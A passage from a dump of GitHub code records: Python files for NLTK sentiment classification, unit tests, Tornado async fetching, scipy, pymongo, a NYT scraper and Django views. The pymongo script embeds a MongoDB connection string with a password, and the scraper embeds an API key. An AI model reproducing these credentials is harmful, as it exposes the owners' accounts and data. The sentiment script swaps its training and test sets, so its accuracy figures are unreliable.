"line_number": 365, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 365, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 366, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 367, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 383, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 384, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 397, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 404, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 404, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 405, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 405, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 409, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 432, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 457, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 472, "usage_type": "call"}]} +{"seq_id": "39839285953", "text": "import re\nimport csv\nimport random\nfrom statistics import mode\n\nimport nltk\nimport numpy as np\nfrom flask import Flask, request\nfrom nltk import SklearnClassifier\nfrom nltk.corpus import movie_reviews\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.model_selection import KFold\nfrom sklearn.svm import LinearSVC\nfrom nltk.metrics.scores import (precision, recall)\nfrom nltk import collections\nimport pickle\n\napp = Flask(__name__)\n\npickle_model = \"LinearSVC_classifier.pickle\"\npickle_word_features = \"word_features.pickle\"\nclassifier = None\nword_features = []\nword_features_2gram = []\n\ndef get_ngrams(text, n ):\n n_grams = nltk.ngrams(word_tokenize(text), n)\n return [ ' '.join(grams) for grams in n_grams]\n\ndef calc_model():\n global word_features, classifier, word_features_2gram\n # documents = [(list(movie_reviews.words(fileid)), category)\n # for category in movie_reviews.categories()\n # for fileid in movie_reviews.fileids(category)]\n\n documents = []\n documents2gram = []\n\n with open(\"positive.txt\", 'r') as csv_file:\n pos = 1\n for record in csv_file:\n documents.append((word_tokenize(record), pos))\n # sixgrams = get_ngrams(record, 2)\n # documents2gram.append((get_ngrams(record, 2), pos))\n\n with open(\"negative.txt\", 'r') as csv_file:\n for record in csv_file:\n documents.append((word_tokenize(record), 0))\n\n # documents2gram.append((get_ngrams(record, 2), 0))\n\n\n random.shuffle(documents)\n # random.shuffle(documents2gram)\n\n all_words = []\n for lst in documents:\n for w in lst[0]:\n all_words.append(w.lower())\n\n # all_words_2gram = []\n # for lst in documents2gram:\n # for w in lst[0]:\n # all_words_2gram.append(w.lower())\n\n all_words = nltk.FreqDist(all_words)\n print(\"getting features\")\n word_features = list(all_words.keys())[:5000]\n\n # all_words_2gram = nltk.FreqDist(all_words_2gram)\n # print(\"getting features\")\n # word_features_2gram = list(all_words_2gram.keys())[:5000]\n\n save_pickle(pickle_word_features, word_features)\n print(\"saved word features\")\n\n print(\"setting features per tweet\")\n feature_sets = [(find_features(rev), category) for (rev, category) in documents]\n # feature_sets_2gram = [(find_features(rev), category) for (rev, category) in documents2gram]\n\n\n\n k = 10\n cv = KFold(k)\n accur = []\n i = 0\n\n testing_set = feature_sets[1900:] #+ feature_sets_2gram[1900:]\n training_set = feature_sets[:1900] #+ feature_sets_2gram[:1900]\n\n linear_svc_classifier = SklearnClassifier(LinearSVC())\n # classifier = nltk.NaiveBayesClassifier.train(testing_set)\n classifier = linear_svc_classifier.train(testing_set)\n accur.insert(i, nltk.classify.util.accuracy(classifier, training_set))\n\n\n print('LinearSVC_classifier average accuracy:', sum(accur) / len(accur))\n\n # save_pickle(pickle_model, classifier)\n\n\ndef sentiment(text):\n feats = find_features(word_tokenize(text))\n votes = []\n v = classifier.classify(feats)\n votes.append(v)\n # feats = find_features2gram(get_ngrams(text, 2))\n # v = classifier.classify(feats)\n # votes.append(v)\n return mode(votes)\n\n\ndef find_features(tweet):\n global word_features\n words = set(tweet)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n\n return features\n\ndef find_features2gram(tweet):\n global word_features_2gram\n words = set(tweet)\n features = {}\n for w in word_features_2gram:\n features[w] = (w in words)\n\n return features\n\n\ndef save_pickle(filename, what_to_save):\n file = open(filename, \"wb\")\n pickle.dump(what_to_save, file)\n file.close()\n\n\ndef load_pickle(filename):\n return pickle.load(open(filename, 'rb'))\n\n\n\nif __name__ == '__main__':\n calc_model()\n # classifier = load_pickle(pickle_model)\n print(sentiment(\"This movie was awesome! The acting was great, plot was wonderful, and there were pythons...so yea!\"))\n print(sentiment(\"This movie was utter junk. There were absolutely 0 pythons. I don't see what the point was at all. Horrible movie, 0/10\"))\n\n # num_row = 0\n with open('news_texts.txt', encoding=\"utf8\") as content_file:\n head = content_file.readline()\n print(sentiment(head))\n content = content_file.readline()\n print(sentiment(content))\n\n print(sentiment(\"Trump to hit Mexico with tariffs in anti-immigration measure\"))\n\n # app.run(debug=True)\n", "repo_name": "shiraez/PPL_Final", "sub_path": "Nltk/no_pickle.py", "file_name": "no_pickle.py", "file_ext": "py", "file_size_in_byte": 4531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 27, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 27, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 42, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 48, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 53, "usage_type": "call"}, {"api_name": "nltk.FreqDist", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 84, "usage_type": "call"}, {"api_name": "nltk.SklearnClassifier", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 91, "usage_type": "call"}, {"api_name": "nltk.classify.util.accuracy", "line_number": 94, "usage_type": "call"}, {"api_name": "nltk.classify", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 103, "usage_type": "call"}, {"api_name": "statistics.mode", "line_number": 110, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 134, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "20077233151", "text": "'''\nCreated on 10.05.2016\n\n@author: Paul Pasler\n'''\nimport sys, os\nimport unittest\n\nfrom numpy import NaN, isnan, count_nonzero, copy, array\nfrom numpy.testing.utils import assert_allclose\n\nfrom config.config import ConfigProvider\nfrom eeg_processor import SignalProcessor\nfrom util.quality_util import QualityUtil\n\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\n\n\ndef sameEntries(list1, list2):\n if len(list1) != len(list2):\n return False\n\n return all([x in list1 for x in list2])\n\n#TODO make this flexible to config values change\nclass TestSimpleChain(unittest.TestCase):\n\n def setUp(self):\n self.chain = SignalProcessor()\n self.qualUtil = QualityUtil()\n config = ConfigProvider().getProcessingConfig()\n self.upperBound = config.get(\"upperBound\")\n self.lowerBound = config.get(\"lowerBound\")\n self.minQuality = config.get(\"minQual\")\n self.maxNaNValues = config.get(\"maxNaNValues\")\n\n def _checkValidData(self, data, invalid):\n self.assertEqual(invalid, self.maxNaNValues < count_nonzero(isnan(data)))\n\n def test_process_sunshine(self):\n data = [-2.0, -1.0, 0, 1.0, 2.0]\n qual = [15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n assert_allclose(proc, [-1.0, -0.5, 0, 0.5, 1])\n\n def test_process_badQuality(self):\n data = [-2.0, -1.0, 0, 1.0, 2.0]\n qual = [15, 0, self.minQuality-1, self.minQuality, self.minQuality+1]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n assert_allclose(proc, [-1.0, NaN, NaN, 0.5, 1])\n\n def test_process_replaceSequences(self):\n data = [1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 4.0]\n qual = [15, 15,15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n assert_allclose(proc, [NaN, NaN, NaN, NaN, NaN, 0.5, 1.0])\n\n def test_process_replaceOutliners(self):\n data = [-5000, self.lowerBound-1, self.lowerBound, self.lowerBound+1, self.upperBound-1, self.upperBound, self.upperBound+1, 5000]\n qual = [15, 15, 15, 15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n self.assertEquals(count_nonzero(isnan(proc)), 4)\n\n def test_process_allTogether(self):\n data = [3.0, 1.0, 1.0, 1.0, 1.0, 1.0, self.lowerBound-1, self.upperBound+1, -8, -4.0, 2.0, 4.0]\n cp = copy(data[:])\n qual = [self.minQuality-1, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n #make sure we work on copies only\n assert_allclose(cp, data)\n assert_allclose(proc, [NaN, NaN, NaN, NaN, NaN, NaN, NaN, NaN, -1.0, -0.5, 0.25, 0.5])\n\n def test_checkValid(self):\n maxNaNValues = self.maxNaNValues\n for length in range(0, maxNaNValues+1):\n data = self._getNaNList(length)\n qual = [15]*length\n _, invalidData = self.chain.process(data, qual)\n self.assertFalse(invalidData, \"length %d\" % length)\n \n for length in range(maxNaNValues+1, maxNaNValues+5):\n data = self._getNaNList(length)\n qual = [15]*length\n _, invalidData = self.chain.process(data, qual)\n self.assertTrue(invalidData, \"length %d\" % length)\n\n def _getNaNList(self, length):\n return array([NaN]*length)\n\n\nif __name__ == \"__main__\":\n unittest.main()", "repo_name": "zjucsxxd/current-adas", "sub_path": "project/code/src/test/chain_test.py", "file_name": "chain_test.py", "file_ext": "py", "file_size_in_byte": 3645, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 28, "usage_type": "attribute"}, {"api_name": "eeg_processor.SignalProcessor", "line_number": 31, "usage_type": "call"}, {"api_name": "util.quality_util.QualityUtil", "line_number": 32, "usage_type": "call"}, {"api_name": "config.config", "line_number": 33, "usage_type": "name"}, {"api_name": "config.config.ConfigProvider", "line_number": 33, "usage_type": "call"}, {"api_name": "config.config.get", "line_number": 34, "usage_type": "call"}, {"api_name": "config.config", "line_number": 34, "usage_type": "name"}, {"api_name": "config.config.get", "line_number": 35, "usage_type": "call"}, {"api_name": "config.config", "line_number": 35, "usage_type": "name"}, {"api_name": "config.config.get", "line_number": 36, "usage_type": "call"}, {"api_name": "config.config", "line_number": 36, "usage_type": "name"}, {"api_name": "config.config.get", "line_number": 37, "usage_type": "call"}, {"api_name": "config.config", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 100, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "15487426028", "text": "import json\n\nimport requests\n\nyearWiseDataList = []\npercentRise = []\nyears = []\nresponse_API = requests.get('https://datausa.io/api/data?drilldowns=Nation&measures=Population')\nassert response_API.status_code == 200\n\ndata = response_API.text\n\npopulationData = json.loads(data)\nnumOfYears = (len(populationData['data']))\nidNation = populationData['data'][0]['ID Nation']\nnation = populationData['data'][0]['Nation']\nfor index in range(0, numOfYears):\n yearWiseDataList.append(populationData['data'][index]['Population'])\n years.append(populationData['data'][index]['Year'])\nyearWiseDataList = yearWiseDataList[::-1]\nyears = years[::-1]\n\nfor index in range(1, len(yearWiseDataList)):\n rise = yearWiseDataList[index] - yearWiseDataList[index - 1]\n percentRise.append((rise * 100) / yearWiseDataList[index - 1])\nprint(percentRise)\n\nprint((percentRise.index(max(percentRise))) + 1)\n\nmaxRiseYear = years[(percentRise.index(max(percentRise))) + 1]\nminRiseYear = years[(percentRise.index(min(percentRise))) + 1]\nprint('According to', idNation, 'in ', numOfYears, ' years from ', years[0], ' to', years[len(years) - 1],\n ' peak population was ', max(percentRise), '% in ', maxRiseYear, ' and lowest population increase was ',\n min(percentRise), '% in ', minRiseYear, '.')\n", "repo_name": "Siddhesh23/pythonProject", "sub_path": "Tests/APITest.py", "file_name": "APITest.py", "file_ext": "py", "file_size_in_byte": 1285, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "28530383479", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\nimport C01_aufg_a as C01\r\n\r\nprint(\"Hier entsteht Plot 1\")\r\nfig, (ax1,ax2) = plt.subplots(2,1,constrained_layout=True, sharex=True)\r\n\r\nx_plot = np.linspace(0, 10)\r\nax1.plot(C01.t, C01.U + C01.U_inf,'x', label=\"U(t)\") # t in ms\r\n#ax1.plot(x_plot, U_fit(x_plot, *params ))\r\n#ax1.set_yscale(\"log\")\r\nax1.set_xlabel(\"$t / \\\\unit{{\\\\milli\\\\s}}$\")\r\nax1.set_ylabel(\"$ \\\\left( U - U \\\\left(\\\\infty \\\\right) \\\\right)/ \\\\unit{{\\\\volt}}$\")\r\n\r\nax1.grid()\r\n\r\n\r\n\r\nax2.plot(C01.t, C01.U_pos, 'x')\r\nax2.plot(x_plot, C01.params[0]*x_plot+ C01.params[1], label=\"lineare Regression\")\r\nax2.set_xlabel(\"$t / \\\\unit{{\\\\milli\\\\s}}$\")\r\nax2.set_ylabel(\"$\\ln\\\\left(U / U\\\\left(\\\\infty \\\\right)\\\\right)$\")\r\nax2.grid()\r\nfig.legend()\r\n\r\nplt.savefig(\"build/C01_aufg_a.pdf\")", "repo_name": "Enno-Enno/PraktikumWS2223", "sub_path": "05_v353/C01a_aufg_a_plot.py", "file_name": "C01a_aufg_a_plot.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 9, "usage_type": "call"}, {"api_name": "C01_aufg_a.t", "line_number": 10, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.U", "line_number": 10, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.U_inf", "line_number": 10, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.t", "line_number": 20, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.U_pos", "line_number": 20, "usage_type": "attribute"}, {"api_name": "C01_aufg_a.params", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "8648095647", "text": "from tornado import gen\nfrom tornado.httpclient import AsyncHTTPClient\nfrom tornado.ioloop import IOLoop\n\n\n@gen.coroutine\ndef fetch1(url):\n http_client = AsyncHTTPClient()\n response = yield http_client.fetch(url)\n return response.body\n\n\nasync def fetch2(url):\n http_client = AsyncHTTPClient()\n response = await http_client.fetch(url)\n return response.body\n\n\n@gen.coroutine\ndef fetch3(url):\n http_client = AsyncHTTPClient()\n fetch_future = http_client.fetch(url)\n future = gen.Future()\n\n def callback(f):\n result = f.result().body\n print('Done: ', future.done())\n future.set_result(result)\n print('Done: ', future.done())\n\n fetch_future.add_done_callback(callback)\n return (\n yield future\n )\n\n\n@gen.coroutine\ndef fetch4(url):\n http_client = AsyncHTTPClient()\n responses = [\n http_client.fetch(url),\n http_client.fetch(url)\n ]\n results = []\n for i in (yield responses):\n print('-', i.body)\n results.append(i.body)\n return results\n\n\n@gen.coroutine\ndef run_tasks():\n tasks = [\n fetch1('http://example.com'),\n fetch2('http://example.com'),\n fetch3('http://example.com'),\n fetch4('http://example.com'),\n ]\n for r in (yield gen.multi(tasks)):\n print(r)\n print('done')\n\n\nIOLoop.current().run_sync(run_tasks)\n", "repo_name": "syurskyi/Python_Topics", "sub_path": "110_concurrency_parallelism/001_asynchronous/examples/ITVDN_Python_Advanced/_tornado/example4_async_client.py", "file_name": "example4_async_client.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 8, "usage_type": "call"}, {"api_name": "tornado.gen.coroutine", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 6, "usage_type": "name"}, {"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 14, "usage_type": "call"}, {"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 21, "usage_type": "call"}, {"api_name": "tornado.gen.Future", "line_number": 23, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 23, "usage_type": "name"}, {"api_name": "tornado.gen.coroutine", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 19, "usage_type": "name"}, {"api_name": "tornado.httpclient.AsyncHTTPClient", "line_number": 39, "usage_type": "call"}, {"api_name": "tornado.gen.coroutine", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 37, "usage_type": "name"}, {"api_name": "tornado.gen.multi", "line_number": 59, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 59, "usage_type": "name"}, {"api_name": "tornado.gen.coroutine", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 51, "usage_type": "name"}, {"api_name": "tornado.ioloop.IOLoop.current", "line_number": 64, "usage_type": "call"}, {"api_name": "tornado.ioloop.IOLoop", "line_number": 64, "usage_type": "name"}]} +{"seq_id": "72325859045", "text": "from scipy import optimize as opt\r\nimport numpy as np\r\n\r\ndef f1(nums):\r\n x = nums\r\n f = np.zeros(1)\r\n f[0] = 2 ** x + 5 * x - 3\r\n return f\r\n\r\ndef f2(nums):\r\n x, y = nums\r\n f = np.zeros(2)\r\n f[0] = 2 * x + np.cos(y)\r\n f[1] = np.sin(x + 1) - y\r\n return f\r\n\r\nif __name__ == '__main__':\r\n sol = opt.root(f1, np.zeros(1), method='krylov')\r\n print(sol.x)\r\n sol = opt.root(f2, np.array([2, 1.2]), method='krylov')\r\n print(sol.x)", "repo_name": "Arthur-Badretdinov/MyProjects", "sub_path": "Scipy2_1/Scipy2_1.py", "file_name": "Scipy2_1.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 14, "usage_type": "call"}, {"api_name": "scipy.optimize.root", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.optimize.root", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "24994838382", "text": "# 载入 pymongo 套件\nimport pymongo\nimport certifi\nfrom bson.objectid import ObjectId\n\n# 连线到 MongoDB 云端资料库\n\nclient = pymongo.MongoClient(\n \"mongodb+srv://root:112611You@mycluster.d222soe.mongodb.net/?retryWrites=true&w=majority\",\n tlsCAFile=certifi.where(),\n)\n# 把资料放进资料库中\ndb = client.website # 选择操作 test 资料库\n\ncollection = db.users # 选择操作 users 集合\n\n# 取得集合中的第一笔文件资料\n# data=collection.find_one()\n# 根据 ObjectId 取得文件资料\n# data = collection.find_one(ObjectId(\"64326c95cbad3845acb618a8\"))\n# 取得文件资料中的栏位\n# print(data[\"_id\"])\n# print(data[\"name\"])\n# print(data)\n# 一次取得多笔文件资料\ncursor=collection.find()\nfor doc in cursor:\n print(doc[\"name\"])\n", "repo_name": "cfy1126/python", "sub_path": "mongo-practice-r.py", "file_name": "mongo-practice-r.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "certifi.where", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "35965408802", "text": "\n# coding: utf-8\n\n# In[82]:\n\nimport csv\nimport nytimesarticle\nfrom nytimesarticle import articleAPI\napi = articleAPI('4a7645206171440aa6064abf7d8a764b')\n\n\ndef parse_articles(articles):\n '''\n This function takes in a response to the NYT api and parses\n the articles into a list of dictionaries\n '''\n news = []\n if 'response' in articles :\n for i in articles[\"response\"][\"docs\"]:\n dic = {}\n #dic['id'] = i['_id']\n\n #dic['headline'] = i['headline']['main'].encode(\"utf8\")\n\n # dic['date'] = i['pub_date'][0:10]\n\n #dic['source'] = i['source']\n #dic['type'] = i['type_of_material']\n dic['url'] = i['web_url']\n #dic['word_count'] = i['word_count']\n news.append(dic)\n return(news) \n\n\nall_articles = []\nfor i in range(0,100):\n articles = api.search(q = \"olympics\",\n #begin_date = 20180101,\n #end_date = 20180115,\n page = i)\n articles = parse_articles(articles)\n all_articles = all_articles + articles\n \n \nimport csv\nkeys = all_articles[0].keys()\noutputfile = open('E:/dic_sample_data_new/article_url_olympics_test.csv', 'w',newline='') \ndict_writer = csv.DictWriter(outputfile,keys)\ndict_writer.writerows(all_articles)\noutputfile.close()\n\n\n# In[83]:\n\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\nimport urllib.request\nimport csv\n\n\ndef tag_visible(element):\n if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n\ndef text_from_html(body):\n soup = BeautifulSoup(body, 'html.parser')\n texts = soup.findAll(text=True)\n visible_texts = filter(tag_visible, texts) \n return u\" \".join(t.strip() for t in visible_texts)\n\n\ni=1\nwith open ('E:/dic_sample_data_new/article_url_olympics_test.csv') as csvDataFile:\n csvReader = csv.reader(csvDataFile)\n for row in csvReader:\n html = urllib.request.urlopen(row[0]).read()\n outputfile = open(\"E:/dic_sample_data_new/article_olympics_test%s.txt\" %i,\"w\",encoding=\"utf-8\")\n i+=1\n outputfile.write(text_from_html(html))\n outputfile.close()\n \n\n\n# In[ ]:\n\n\n\n", "repo_name": "vigneshwaran-v/Document-classification-using-Apache-Spark", "sub_path": "data_collection_code/data_collection.py", "file_name": "data_collection.py", "file_ext": "py", "file_size_in_byte": 2250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nytimesarticle.articleAPI", "line_number": 9, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 48, "usage_type": "call"}, {"api_name": "bs4.element.Comment", "line_number": 64, "usage_type": "argument"}, {"api_name": "bs4.BeautifulSoup", "line_number": 70, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 78, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 80, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 80, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "73936568166", "text": "import datetime\nimport itertools\nimport os\nimport random\nimport requests\nimport StringIO\nimport time\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.management import call_command\nfrom django.core.paginator import Paginator\nfrom django.core.servers.basehttp import FileWrapper\nfrom django.db.models import Q\nfrom django.http import StreamingHttpResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.template import RequestContext\nfrom django.utils import timezone\nfrom easy_pdf.views import PDFTemplateView\nfrom models import *\nfrom forms import *\n\ndef home(request):\n current_time = timezone.now()\n alerts = Alert.objects.filter(start_time__lte=current_time,\n end_time__gt=current_time)\n news = News.objects.order_by('-date_posted')[:2]\n bills = Legislation.objects.all()[:5]\n news_links = NewsLink.objects.order_by('-date_published')[:5]\n slides = HomepageSlide.objects.filter(active=True)\n calendars = GoogleCalendar.objects.filter(show_on_homepage=True)\n return render(request, 'home.html', locals())\n\ndef page(request, page_slug):\n page = get_object_or_404(Page, slug=page_slug)\n return render(request, 'page.html', locals())\n\ndef for_students(request):\n users = 'Student'\n desc = \"ASG has all the info you need to know about what's happening every week, how to work with a faculty member, how to propose a new project, and more. Our online services help you find a job, sell/buy your books, and get a cab, while our fairs provide opportunities to connect with student groups and find off-campus housing.\"\n resources = Resource.objects.filter(type='R', users='ST', is_active=True)\n services = Resource.objects.filter(type='S', users='ST', is_active=True)\n return render(request, 'resources.html', locals())\n\ndef for_groups(request):\n users = 'Student Group'\n desc = 'Want to know how to start a new student group, finance it, or publicize it? Check out our 2013-14 Student Handbook for all this and more. Also be sure to read the PR Guide for info on how to flyer, reserve rooms and tables, advertise, and print.'\n resources = Resource.objects.filter(type='R', users='SG', is_active=True)\n services = Resource.objects.filter(type='S', users='SG', is_active=True)\n return render(request, 'resources.html', locals())\n\ndef calendar(request):\n page_name = 'Calendar'\n calendars = GoogleCalendar.objects.filter(display_on_calendar_page=True)\n return render(request, 'calendar.html', locals())\n\ndef office_hours(request):\n page_name = 'Office Hours'\n office_hours = True\n calendars = GoogleCalendar.objects.filter(is_office_hours=True)\n return render(request, 'calendar.html', locals())\n\nnews_per_page = 10\ndef list_news(request):\n all_news = News.objects.order_by('-date_posted')\n p = Paginator(all_news, news_per_page)\n last_page = p.num_pages\n pages = xrange(1, last_page+1)\n page = int(request.GET.get('page', 1))\n news = p.page(page).object_list\n return render(request, 'list_news.html', locals())\n\nlegislation_per_page = 10\ndef list_legislation(request):\n all_legislation = Legislation.objects.order_by('-status_date', '-code')\n p = Paginator(all_legislation, legislation_per_page)\n last_page = p.num_pages\n pages = xrange(1, last_page+1)\n page = int(request.GET.get('page', 1))\n bills = p.page(page).object_list\n return render(request, 'list_legislation.html', locals())\n\nnews_links_per_page = 10\ndef list_news_links(request):\n all_news_links = NewsLink.objects.order_by('-date_published')\n p = Paginator(all_news_links, news_links_per_page)\n last_page = p.num_pages\n pages = xrange(1, last_page+1)\n page = int(request.GET.get('page', 1))\n news_links = p.page(page).object_list\n return render(request, 'list_news_links.html', locals())\n\ndef news(request, year, month, slug):\n from_homepage = 'from_homepage' in request.GET\n news = get_object_or_404(News, date_posted__year=year, date_posted__month=month, slug=slug)\n return render(request, 'news.html', locals())\n\ndef contact(request):\n exec_board_positions = Position.objects.filter(on_exec_board=True)\n senate_leadership_positions = Position.objects.filter(senate_leadership=True)\n return render(request, 'contact.html', locals())\n\ndef cabinet(request):\n exec_members = Person.objects.filter(positions__on_exec_board=True)\\\n .order_by('positions__order')\n return render(request, 'cabinet.html', locals())\n\ndef senators(request):\n senators = Person.objects.filter(positions__name='Senator').order_by('groups_represented')\n return render(request, 'senators.html', locals())\n\ndef projects(request):\n # iterator() doesn't supply count()\n projects = list(Project.objects.filter(active=True))\n random.shuffle(projects)\n return render(request, 'projects.html', locals())\n\ndef committees(request):\n committees = list(Committee.objects.filter(show_in_list=True))\n random.shuffle(committees)\n return render(request, 'committees.html', locals())\n\ndef view_project(request, id):\n project = get_object_or_404(Project, id=int(id))\n return render(request, 'view_project.html', locals())\n\ndef people(request, id):\n 'Display the profile of a single person'\n person = get_object_or_404(Person, id=int(id))\n return render(request, 'person.html', locals())\n\nTUMBLR_API_KEY = os.environ['TUMBLR_API_KEY']\ndef parse_post_date(post):\n post['date'] = datetime.datetime.strptime(post['date'], '%Y-%m-%d %H:%M:%S GMT')\n\ndef blog(request):\n api_url = 'http://api.tumblr.com/v2/blog/nu-asg.tumblr.com/posts/text?api_key=%s' % TUMBLR_API_KEY\n response = requests.get(api_url)\n posts = response.json()['response']['posts']\n map(parse_post_date, 